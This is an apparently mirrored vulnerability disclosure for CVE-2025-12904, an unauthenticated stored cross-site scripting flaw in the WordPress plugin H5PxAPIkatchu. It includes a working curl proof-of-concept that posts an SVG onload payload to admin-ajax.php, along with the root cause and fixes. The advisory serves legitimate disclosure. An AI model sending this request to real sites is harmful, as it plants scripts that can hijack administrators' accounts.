CVE-2025-12904 PoC — WordPress plugin SNORDIANs H5PxAPIkatchu 跨站脚本漏洞

Source

https://github.com/MooseLoveti/SNORDIAN-s-H5PxAPIkatchu-CVE-Report

Associated Vulnerability

Title:WordPress plugin SNORDIANs H5PxAPIkatchu 跨站脚本漏洞 (CVE-2025-12904)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台具有在基于PHP和MySQL的服务器上架设个人博客网站的功能。WordPress plugin是一个应用插件。 WordPress plugin SNORDIANs H5PxAPIkatchu 0.4.17及之前版本存在跨站脚本漏洞，该漏洞源于输入清理和输出转义不足，可能导致存储型跨站脚本攻击。

Description

Disclosure for CVE-2025-12904

Readme

# SNORDIAN's-H5PxAPIkatchu-CVE-Report
Disclosure for CVE-2025-12904

# CVE-2025-12904 - Vulnerability in SNORDIAN's H5PxAPIkatchu

This repository discloses a vulnerability discovered in [SNORDIAN's H5PxAPIkatchu <= 0.4.16](https://wordpress.org/plugins/h5pxapikatchu/),WordPress plugin developed by otacke.

## 🛠 Affected Version

- **Product**: SNORDIAN's H5PxAPIkatchu
- **Version**: v0.4.16
- **URL**: https://wordpress.org/plugins/h5pxapikatchu/

---

## 🔒 Assigned CVE
| CVE ID            | Type                      | Component                | Impact                    |
|-------------------|---------------------------|--------------------------|---------------------------|
| CVE-2025-12904    |  Unauthenticated Stored Cross-Site Scripting via insert_data                |  class-table-view.php            | Authenticated attacker can execute JS     |  

---

## 🧾 Detailed a Description

### CVE-2025-12904 — Unauthenticated Stored Cross-Site Scripting via insert_data

 - **Affected Component**: h5pxapikatchu admin page
 - **Attack Vector**: Unauthenticated via POST request
 - **Trigger**: An attacker can inject malicious scripts into the admin interface by exploiting the insert_data action to store arbitrary scripts.

```
curl -i -X POST 'http://localhost:8080/wp-admin/admin-ajax.php' \
  --data-urlencode 'action=insert_data' \
  --data-urlencode 'xapi={
    "object":{"id":"http://localhost:8080/?id=2"},
    "result":{"response":"<svg onload=alert(1)>"}
  }'

```
※If the id within the object does not exist, it will fail.

 - **Impact**: Stored scripts may be executed, posing a risk of serious harm such as account hijacking.

## ❓Reason for the vulnerability

The `insert_data()` function did not perform any permission checks, allowing malicious input to be saved without authentication. Furthermore, these entries were displayed unescaped on the administration interface.
 - The `insert_data()` function uses `current_user_can` to prevent unauthorised execution.
 - By using esc_html($value) rather than echo $value, you can prevent XSS execution.

　

 
## 🔍 Discoverer

**Name**: MooseLove  
**Role**: Independent security researcher / bug hunter  
**Contact**: Available upon request  

---

## 📚 References

- Product: https://wordpress.org/plugins/h5pxapikatchu/

---

## ⚠️ License

This advisory is provided for public security awareness. Free to share with attribution.

File Snapshot


 [4.0K]  /data/pocs/a2f42bd37236da64e41561ce8993f279b4fb02ae
└── [2.4K]  README.md

1 directory, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!